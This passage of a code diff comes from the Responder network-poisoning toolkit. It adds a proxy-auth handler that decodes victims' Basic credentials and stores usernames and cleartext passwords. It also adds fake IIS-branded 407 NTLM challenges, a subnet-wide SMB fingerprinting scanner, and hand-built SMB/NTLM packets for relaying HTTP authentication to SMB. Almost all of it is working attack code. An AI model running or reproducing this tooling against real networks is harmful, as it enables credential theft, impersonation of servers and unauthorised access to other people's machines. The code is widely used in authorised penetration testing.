+		ClearText_Auth = b64decode(''.join(Basic_Auth))
+		SaveToDb({
+			'module': 'Proxy-Auth', 
+			'type': 'Basic', 
+			'client': client, 
+			'user': ClearText_Auth.split(':')[0], 
+			'cleartext': ClearText_Auth.split(':')[1], 
+			})
+
+		return False
+	else:
+		if settings.Config.Basic:
+			Response = WPAD_Basic_407_Ans()
+			if settings.Config.Verbose:
+				print text("[Proxy-Auth] Sending BASIC authentication request to %s" % client)
+
+		else:
+			Response = WPAD_Auth_407_Ans()
+
+		return str(Response)
+
+class Proxy_Auth(SocketServer.BaseRequestHandler):
+
+
+    def handle(self):
+		try:
+                    for x in range(2):
+                        data = self.request.recv(4096)
+                        self.request.send(PacketSequence(data, self.client_address[0]))
+
+		except:
+                   	pass
+
+

settings.py

@@ -20,7 +20,7 @@ import subprocess
 
 from utils import *
 
-__version__ = 'Responder 2.3.1'
+__version__ = 'Responder 2.3.2.5'
 
 class Settings:
 	
@@ -147,30 +147,35 @@ class Settings:
 		self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])
 
 		# Auto Ignore List
-		self.AutoIgnore                 = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
-		self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
-		self.AutoIgnoreList             = []
+		self.AutoIgnore                       = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
+		self.CaptureMultipleCredentials       = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
+                self.CaptureMultipleHashFromSameHost  = self.toBool(config.get('Responder Core', 'CaptureMultipleHashFromSameHost'))
+		self.AutoIgnoreList                   = []
 
 		# CLI options
-		self.LM_On_Off       = options.LM_On_Off
-		self.WPAD_On_Off     = options.WPAD_On_Off
-		self.Wredirect       = options.Wredirect
-		self.NBTNSDomain     = options.NBTNSDomain
-		self.Basic           = options.Basic
-		self.Finger_On_Off   = options.Finger
-		self.Interface       = options.Interface
-		self.OURIP           = options.OURIP
-		self.Force_WPAD_Auth = options.Force_WPAD_Auth
-		self.Upstream_Proxy  = options.Upstream_Proxy
-		self.AnalyzeMode     = options.Analyze
-		self.Verbose         = options.Verbose
-		self.CommandLine     = str(sys.argv)
+                self.ExternalIP         = options.ExternalIP
+		self.LM_On_Off          = options.LM_On_Off
+		self.WPAD_On_Off        = options.WPAD_On_Off
+		self.Wredirect          = options.Wredirect
+		self.NBTNSDomain        = options.NBTNSDomain
+		self.Basic              = options.Basic
+		self.Finger_On_Off      = options.Finger
+		self.Interface          = options.Interface
+		self.OURIP              = options.OURIP
+		self.Force_WPAD_Auth    = options.Force_WPAD_Auth
+		self.Upstream_Proxy     = options.Upstream_Proxy
+		self.AnalyzeMode        = options.Analyze
+		self.Verbose            = options.Verbose
+		self.ProxyAuth_On_Off   = options.ProxyAuth_On_Off
+		self.CommandLine        = str(sys.argv)
+
+                if self.ExternalIP:
+                        self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
 
 		if self.HtmlToInject is None:
 			self.HtmlToInject = ''
 
-		self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
-
+                self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
 		self.IP_aton         = socket.inet_aton(self.Bind_To)
 		self.Os_version      = sys.platform
 
@@ -190,18 +195,13 @@ class Settings:
 		logging.warning('Responder Started: %s' % self.CommandLine)
 
 		Formatter = logging.Formatter('%(asctime)s - %(message)s')
-                CLog_Handler = logging.FileHandler(self.ResponderConfigDump, 'a')
 		PLog_Handler = logging.FileHandler(self.PoisonersLogFile, 'w')
 		ALog_Handler = logging.FileHandler(self.AnalyzeLogFile, 'a')
-                CLog_Handler.setLevel(logging.INFO)
 		PLog_Handler.setLevel(logging.INFO)
 		ALog_Handler.setLevel(logging.INFO)
 		PLog_Handler.setFormatter(Formatter)
 		ALog_Handler.setFormatter(Formatter)
 
-		self.ResponderConfigLogger = logging.getLogger('Config Dump Log')
-		self.ResponderConfigLogger.addHandler(CLog_Handler)
-
 		self.PoisonersLogger = logging.getLogger('Poisoners Log')
 		self.PoisonersLogger.addHandler(PLog_Handler)
 
@@ -212,8 +212,8 @@ class Settings:
                 DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
                 RoutingInfo = subprocess.check_output(["netstat", "-rn"])
                 Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo)
-                self.ResponderConfigLogger.warning(Message)
-                self.ResponderConfigLogger.warning(str(self))
+                utils.DumpConfig(self.ResponderConfigDump, Message)
+                utils.DumpConfig(self.ResponderConfigDump,str(self))
 
 def init():
 	global Config

tools/RelayHTTPSMB/Finger.py

@@ -0,0 +1,225 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import re,sys,socket,struct
+from socket import *
+from odict import OrderedDict
+
+__version__ = "0.3"
+Timeout = 0.5
+class Packet():
+    fields = OrderedDict([
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+
+def longueur(payload):
+    length = struct.pack(">i", len(''.join(payload)))
+    return length
+
+class SMBHeader(Packet):
+    fields = OrderedDict([
+        ("proto",      "\xff\x53\x4d\x42"),
+        ("cmd",        "\x72"),
+        ("error-code", "\x00\x00\x00\x00" ),
+        ("flag1",      "\x00"),
+        ("flag2",      "\x00\x00"),
+        ("pidhigh",    "\x00\x00"),
+        ("signature",  "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("reserved",   "\x00\x00"),
+        ("tid",        "\x00\x00"),
+        ("pid",        "\x00\x00"),
+        ("uid",        "\x00\x00"),
+        ("mid",        "\x00\x00"),
+    ])
+
+class SMBNego(Packet):
+    fields = OrderedDict([
+        ("Wordcount", "\x00"),
+        ("Bcc", "\x62\x00"),
+        ("Data", "")
+    ])
+    
+    def calculate(self):
+        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
+
+class SMBNegoData(Packet):
+    fields = OrderedDict([
+        ("BuffType","\x02"),
+        ("Dialect", "NT LM 0.12\x00"),
+    ])
+
+
+class SMBSessionFingerData(Packet):
+    fields = OrderedDict([
+        ("wordcount", "\x0c"),
+        ("AndXCommand", "\xff"),
+        ("reserved","\x00" ),
+        ("andxoffset", "\x00\x00"),
+        ("maxbuff","\x04\x11"),
+        ("maxmpx", "\x32\x00"),
+        ("vcnum","\x00\x00"),
+        ("sessionkey", "\x00\x00\x00\x00"),
+        ("securitybloblength","\x4a\x00"),
+        ("reserved2","\x00\x00\x00\x00"),
+        ("capabilities", "\xd4\x00\x00\xa0"),
+        ("bcc1",""),
+        ("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
+
+    ])
+    def calculate(self):
+        self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
+
+##Now Lanman
+class SMBHeaderLanMan(Packet):
+    fields = OrderedDict([
+        ("proto", "\xff\x53\x4d\x42"),
+        ("cmd", "\x72"),
+        ("error-code", "\x00\x00\x00\x00" ),
+        ("flag1", "\x08"),
+        ("flag2", "\x01\xc8"),
+        ("pidhigh", "\x00\x00"),
+        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("reserved", "\x00\x00"),
+        ("tid", "\x00\x00"),
+        ("pid", "\x3c\x1b"),
+        ("uid", "\x00\x00"),
+        ("mid", "\x00\x00"),
+    ])
+
+class SMBNegoDataLanMan(Packet):
+    fields = OrderedDict([
+        ("Wordcount", "\x00"),
+        ("Bcc", "\x54\x00"),
+        ("BuffType","\x02"),
+        ("Dialect", "NT LM 0.12\x00"),
+
+    ])
+    def calculate(self):
+        CalculateBCC = str(self.fields["BuffType"])+str(self.fields["Dialect"])
+        self.fields["Bcc"] = struct.pack("<h",len(CalculateBCC))
+
+#####################
+
+def atod(a): 
+    return struct.unpack("!L",inet_aton(a))[0]
+
+def dtoa(d): 
+    return inet_ntoa(struct.pack("!L", d))
+
+def OsNameClientVersion(data):
+	try:
+		length = struct.unpack('<H',data[43:45])[0]
+		OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
+		return OsVersion, ClientVersion
+
+	except:
+	 	return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
+
+def GetHostnameAndDomainName(data):
+	try:
+		DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
+		return Hostname, DomainJoined
+	except:
+	 	return "Could not get Hostname.", "Could not get Domain joined"
+
+def DomainGrab(Host):
+    s = socket(AF_INET, SOCK_STREAM)
+    try:
+       s.settimeout(Timeout)
+       s.connect(Host)
+    except:
+       print "Host down or port close, skipping"
+       pass
+    try:
+       h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
+       n = SMBNegoDataLanMan()
+       n.calculate()
+       packet0 = str(h)+str(n)
+       buffer0 = longueur(packet0)+packet0
+       s.send(buffer0)
+       data = s.recv(2048)
+       if data[8:10] == "\x72\x00":
+          return GetHostnameAndDomainName(data)
+    except:
+       pass 
+
+def SmbFinger(Host):
+    s = socket(AF_INET, SOCK_STREAM)
+    try:
+       s.settimeout(Timeout)
+       s.connect(Host)
+    except:
+       print "Host down or port close, skipping"
+       pass
+    try:     
+       h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
+       n = SMBNego(Data = SMBNegoData())
+       n.calculate()
+       packet0 = str(h)+str(n)
+       buffer0 = longueur(packet0)+packet0
+       s.send(buffer0)
+       data = s.recv(2048)
+       if data[8:10] == "\x72\x00":
+          head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
+          t = SMBSessionFingerData()
+          t.calculate() 
+          packet0 = str(head)+str(t)
+          buffer1 = longueur(packet0)+packet0  
+          s.send(buffer1) 
+          data = s.recv(2048)
+       if data[8:10] == "\x73\x16":
+          return OsNameClientVersion(data)
+    except:
+       pass
+##################
+#run it
+def ShowResults(Host):
+    s = socket(AF_INET, SOCK_STREAM)
+    try:
+       s.settimeout(Timeout)
+       s.connect(Host)
+    except:
+       raise
+       return False
+
+    try:
+       print "Retrieving information for %s..."%Host[0]
+       OsVer, LanManClient = SmbFinger(Host)
+       print "Os version: '%s'\nLanman Client: '%s'"%(OsVer, LanManClient)
+       Hostname, DomainJoined = DomainGrab(Host)
+       print "Machine Hostname: '%s'\nThis machine is part of the '%s' domain\n"%(Hostname, DomainJoined)
+    except:
+       pass
+
+def RunFinger(Host):
+    m = re.search("/", str(Host))
+    if m :
+       net,_,mask = Host.partition('/')
+       mask = int(mask)
+       net = atod(net)
+       for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
+           ShowResults((host,445))
+    else:
+       ShowResults((Host,445))   
+

tools/RelayHTTPSMB/HTTPRelayPacket.py

@@ -0,0 +1,908 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
+import sys
+import random
+import time
+from odict import OrderedDict
+import datetime
+from base64 import b64decode, b64encode
+
+def longueur(payload):
+    length = struct.pack(">i", len(''.join(payload)))
+    return length
+
+class Packet():
+    fields = OrderedDict([
+        ("data", ""),
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+
+##################HTTP Proxy Relay##########################
+def HTTPCurrentDate():
+    Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
+    return Date
+
+class WPAD_Auth_407_Ans(Packet):
+	fields = OrderedDict([
+		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+		("Type",          "Content-Type: text/html\r\n"),
+		("WWW-Auth",      "Proxy-Authenticate: NTLM\r\n"),
+		("Connection",    "Proxy-Connection: close\r\n"),
+		("Cache-Control",    "Cache-Control: no-cache\r\n"),
+		("Pragma",        "Pragma: no-cache\r\n"),
+		("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
+		("Len",           "Content-Length: 0\r\n"),
+		("CRLF",          "\r\n"),
+	])
+
+
+class WPAD_NTLM_Challenge_Ans(Packet):
+	fields = OrderedDict([
+		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+		("Type",          "Content-Type: text/html\r\n"),
+		("WWWAuth",       "Proxy-Authenticate: NTLM "),
+		("Payload",       ""),
+		("Payload-CRLF",  "\r\n"),
+		("Len",           "Content-Length: 0\r\n"),
+		("CRLF",          "\r\n"),
+	])
+
+	def calculate(self,payload):
+		self.fields["Payload"] = b64encode(payload)
+
+##################SMB Relay Packet##########################
+class SMBHeader(Packet):
+    fields = OrderedDict([
+        ("proto", "\xff\x53\x4d\x42"),
+        ("cmd", "\x72"),
+        ("error-code", "\x00\x00\x00\x00" ),
+        ("flag1", "\x08"),
+        ("flag2", "\x01\xc8"),
+        ("pidhigh", "\x00\x00"),
+        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("Reserved", "\x00\x00"),
+        ("tid", "\x00\x00"),
+        ("pid", "\x3c\x1b"),
+        ("uid", "\x00\x00"),
+        ("mid", "\x00\x00"),
+    ])
+
+class SMBNegoCairo(Packet):
+    fields = OrderedDict([
+        ("Wordcount", "\x00"),
+        ("Bcc", "\x62\x00"),
+        ("Data", "")
+    ])
+    
+    def calculate(self):
+        self.fields["Bcc"] = struct.pack("<H",len(str(self.fields["Data"])))
+
+class SMBNegoCairoData(Packet):
+    fields = OrderedDict([
+        ("Separator1","\x02" ),
+        ("Dialect1", "Cairo 0.xa\x00"), #Let's talk Cairo!
+    ])
+
+class SMBSessionSetupAndxNEGO(Packet):
+    fields = OrderedDict([
+        ("Wordcount", "\x0c"),
+        ("AndXCommand", "\xff"),
+        ("Reserved","\x00" ),
+        ("AndXOffset", "\xec\x00"),              
+        ("MaxBuff","\xff\xff"),
+        ("MaxMPX", "\x32\x00"),
+        ("VCNumber","\x00\x00"),
+        ("SessionKey", "\x00\x00\x00\x00"),
+        ("SecBlobLen","\x4a\x00"),
+        ("Reserved2","\x00\x00\x00\x00"),
+        ("Capabilities", "\xfc\xe3\x01\x80"), 
+        ("Bcc","\xb1\x00"),
+        ##gss api starts here.
+        ("ApplicationHeaderTag","\x60"),
+        ("ApplicationHeaderLen","\x48"),
+        ("AsnSecMechType","\x06"),
+        ("AsnSecMechLen","\x06"),
+        ("AsnSecMechStr","\x2b\x06\x01\x05\x05\x02"),
+        ("ChoosedTag","\xa0"),
+        ("ChoosedTagStrLen","\x3e"),
+        ("NegTokenInitSeqHeadTag","\x30"),
+        ("NegTokenInitSeqHeadLen","\x3c"),
+        ("NegTokenInitSeqHeadTag1","\xA0"),
+        ("NegTokenInitSeqHeadLen1","\x0e"),
+        ("NegTokenInitSeqNLMPTag","\x30"),
+        ("NegTokenInitSeqNLMPLen","\x0c"),
+        ("NegTokenInitSeqNLMPTag1","\x06"),
+        ("NegTokenInitSeqNLMPTag1Len","\x0a"),
+        ("NegTokenInitSeqNLMPTag1Str","\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
+        ("NegTokenInitSeqNLMPTag2","\xa2"),
+        ("NegTokenInitSeqNLMPTag2Len","\x2a"),
+        ("NegTokenInitSeqNLMPTag2Octet","\x04"),
+        ("NegTokenInitSeqNLMPTag2OctetLen","\x28"),
+        ## NTLM packet ##
+        ("Data",                           ""),
+        ## NTLM packet ##
+        ("NegTokenInitSeqMechMessageVersionTerminator","\x00"),
+        ("NativeOs","Windows 2002 Service Pack 3 2600"),
+        ("NativeOsTerminator","\x00\x00"),
+        ("NativeLan","Windows 2002 5.1"),
+        ("NativeLanTerminator","\x00\x00\x00\x00"),
+
+    ])
+    def calculate(self): 
+
+        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
+        self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le')
+
+        CompleteSMBPacketLen = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["AndXOffset"])+str(self.fields["MaxBuff"])+str(self.fields["MaxMPX"])+str(self.fields["VCNumber"])+str(self.fields["SessionKey"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])+str(self.fields["Capabilities"])+str(self.fields["Bcc"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
+
+
+        SecBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
+
+
+        data3 = str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
+
+        data4 = str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
+
+        data5 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
+
+        data6 = str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
+
+        data10 = str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
+       
+        data11 = str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
+
+
+        ## Packet len
+        self.fields["AndXOffset"] = struct.pack("<h", len(CompleteSMBPacketLen)+32)
+        ##Buff Len
+        self.fields["SecBlobLen"] = struct.pack("<h", len(SecBlobLen))
+        ##Complete Buff Len
+        self.fields["Bcc"] = struct.pack("<h", len(CompleteSMBPacketLen)-27)#session setup struct is 27.
+        ##App Header
+        self.fields["ApplicationHeaderLen"] = struct.pack("<B", len(SecBlobLen)-2)
+        ##Asn Field 1
+        self.fields["AsnSecMechLen"] = struct.pack("<B", len(str(self.fields["AsnSecMechStr"])))
+        ##Asn Field 1
+        self.fields["ChoosedTagStrLen"] = struct.pack("<B", len(data3))
+        ##SpNegoTokenLen
+        self.fields["NegTokenInitSeqHeadLen"] = struct.pack("<B", len(data4))
+        ##NegoTokenInit
+        self.fields["NegTokenInitSeqHeadLen1"] = struct.pack("<B", len(data10)) 
+        ## Tag0 Len
+        self.fields["NegTokenInitSeqNLMPLen"] = struct.pack("<B", len(data11))
+        ## Tag0 Str Len
+        self.fields["NegTokenInitSeqNLMPTag1Len"] = struct.pack("<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
+        ## Tag2 Len
+        self.fields["NegTokenInitSeqNLMPTag2Len"] = struct.pack("<B", len(data6))
+        ## Tag3 Len
+        self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = struct.pack("<B", len(str(self.fields["Data"])))
+
+
+class SMBSessionSetupAndxAUTH(Packet):
+    fields = OrderedDict([
+        ("wordcount", "\x0c"),
+        ("AndXCommand", "\xff"),
+        ("reserved","\x00" ),
+        ("andxoffset", "\xfa\x00"),
+        ("maxbuff","\xff\xff"),
+        ("maxmpx", "\x32\x00"),
+        ("vcnum","\x01\x00"),
+        ("sessionkey", "\x00\x00\x00\x00"),
+        ("securitybloblength","\x59\x00"),
+        ("reserved2","\x00\x00\x00\x00"),
+        ("capabilities", "\xfc\xe3\x01\x80"),
+        ("bcc1","\xbf\x00"), 
+        ("ApplicationHeaderTag","\xa1"),
+        ("ApplicationHeaderTagLenOfLen","\x81"),
+        ("ApplicationHeaderLen","\xd1"),
+        ("AsnSecMechType","\x30"),
+        ("AsnSecMechLenOfLen","\x81"),
+        ("AsnSecMechLen","\xce"),
+        ("ChoosedTag","\xa2"),
+        ("ChoosedTagLenOfLen","\x81"),
+        ("ChoosedTagLen","\xcb"),
+        ("ChoosedTag1","\x04"),
+        ("ChoosedTag1StrLenOfLen","\x81"),
+        ("ChoosedTag1StrLen","\xc8"),
+        #### NTLM Packet ####
+        ("Data",  ""),
+        #### End Of SMB ####
+        ("NLMPAuthMsgNull","\x00"),
+        ("NativeOs","Unix"),
+        ("NativeOsTerminator","\x00\x00"),
+        ("ExtraNull",""),
+        ("NativeLan","Samba"),
+        ("NativeLanTerminator","\x00\x00"),
+        ("AndxPadding",""),
+        ])
+
+
+    def calculate(self): 
+        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
+        self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le')
+
+        SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
+
+        NTLMData = str(self.fields["Data"])
+	###### ASN Stuff
+        if len(NTLMData) > 255:
+	   self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
+	   self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0)
+        else:
+           self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
+	   self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
+
+        if len(NTLMData)-8 > 255:
+           self.fields["AsnSecMechLenOfLen"] = "\x82"
+	   self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4)
+        else:
+           self.fields["AsnSecMechLenOfLen"] = "\x81"
+	   self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6)
+
+        if len(NTLMData)-12 > 255:
+           self.fields["ChoosedTagLenOfLen"] = "\x82"
+           self.fields["ChoosedTagLen"] = struct.pack(">H", len(SecurityBlobLen)-8) 
+        else:
+           self.fields["ChoosedTagLenOfLen"] = "\x81"
+           self.fields["ChoosedTagLen"] = struct.pack(">B", len(SecurityBlobLen)-9)
+
+        if len(NTLMData)-16 > 255:
+           self.fields["ChoosedTag1StrLenOfLen"] = "\x82"
+           self.fields["ChoosedTag1StrLen"] = struct.pack(">H", len(SecurityBlobLen)-12)
+        else:
+           self.fields["ChoosedTag1StrLenOfLen"] = "\x81"
+           self.fields["ChoosedTag1StrLen"] = struct.pack(">B", len(SecurityBlobLen)-12)
+
